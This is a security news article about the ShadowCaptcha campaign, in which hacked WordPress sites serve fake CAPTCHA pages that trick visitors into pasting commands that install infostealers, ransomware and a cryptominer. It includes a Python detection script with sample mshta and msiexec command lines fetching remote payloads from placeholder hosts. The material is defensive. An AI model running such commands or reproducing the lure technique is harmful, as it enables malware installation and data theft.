ShadowCaptcha: A New Malware Campaign Uses Fake CAPTCHAs to Steal Data
In August of this year, specialists from Israel’s National Digital Agency uncovered a large-scale campaign known as ShadowCaptcha, designed to compromise users through more than a hundred hacked WordPress websites. These sites had been injected with malicious scripts that redirected visitors to counterfeit CAPTCHA verification pages disguised as services from Google and Cloudflare. The fraudulent pages employed the ClickFix technique, coercing victims into executing Windows commands, thereby opening the door to malware installation.
Researchers highlight that ShadowCaptcha combines social engineering, the abuse of native Windows utilities, and multi-stage payload delivery. The operators’ primary objectives include credential and browser data theft, illicit cryptocurrency mining, and the deployment of ransomware. Infections typically began via two vectors: either through the Run dialog, which invoked msiexec.exe and mshta.exe to deliver Lumma and Rhadamanthys, or through an HTA file that triggered the installation of the Epsilon Red ransomware. Similar ClickFix and HTA techniques had previously been documented by CloudSEK researchers.
The fake CAPTCHA pages automatically executed obfuscated JavaScript, which used the navigator.clipboard.writeText function to copy malicious commands into the victim’s clipboard, ready to be unwittingly pasted and launched. To conceal its activity, the campaign employed anti-debugging mechanisms that blocked browser developer tools, as well as DLL hijacking techniques that allowed the malware to masquerade as legitimate processes.
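The two launch vectors described above (a pasted Run-dialog command that starts msiexec.exe or mshta.exe, which then fetches a remote payload) leave a recognisable trace in endpoint process-creation telemetry. The following detection sketch is an added example written for this article, not code from the researchers; it runs over constructed Sysmon-style event records and flags a listed utility launched with a URL on its command line, noting when the parent is explorer.exe, which is how a command typed into the Run dialog appears.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 fields);
# written for this example, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha.example.invalid/verify.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i https://cdn.example.invalid/update.msi /qn",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\alice\Downloads\app.msi",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Native utilities the article names as the ClickFix launch vector.
LOLBINS = {"mshta.exe", "msiexec.exe"}
# The Run dialog (Win+R) is hosted by explorer.exe, so pasted commands run as its children.
INTERACTIVE_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(event: dict) -> list[str]:
    """Return reasons an event matches the ClickFix pattern; empty if benign."""
    image = basename(event.get("Image", ""))
    if image not in LOLBINS:
        return []
    url = URL_RE.search(event.get("CommandLine", ""))
    if not url:
        return []  # local .msi/.hta launches are routine; require a remote payload
    reasons = [f"{image} fetching remote payload {url.group(0)}"]
    if basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        reasons.append("parent is explorer.exe (consistent with Run dialog)")
    return reasons

def find_suspicious(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index every event that classify() flags, with its reasons."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

if __name__ == "__main__":
    for idx, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

In a real deployment the same two conditions (listed utility plus remote URL, with the explorer.exe parent as a severity boost) map directly onto a SIEM rule over process-creation events.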
In certain instances, ShadowCaptcha deployed the XMRig cryptominer, whose configuration was not hardcoded but dynamically retrieved from Pastebin, enabling attackers to update parameters without modifying the binaries. To further optimize mining efficiency, the malware exploited the vulnerable driver WinRing0x64.sys, granting kernel-level access to CPU registers.
The majority of compromised sites were hosted in Australia, Brazil, Italy, Canada, Colombia, and Israel, with victims spanning industries as diverse as technology, healthcare, hospitality, law, and real estate. The exact method of compromise remains unclear, though researchers report medium confidence that the attackers relied on exploit kits targeting vulnerable plugins, as well as stolen administrator credentials.
To mitigate risks, experts advise organizations to train staff in recognizing ClickFix campaigns, segment networks to limit the spread of malicious processes, and ensure that WordPress installations are kept up to date, with administrative accounts secured via multi-factor authentication.
Researchers emphasize that ShadowCaptcha illustrates the ongoing evolution of social engineering, shifting toward layered attacks that intertwine Windows utilities, obfuscated scripts, and the exploitation of vulnerable drivers—an increasingly sophisticated convergence of technical and psychological tactics.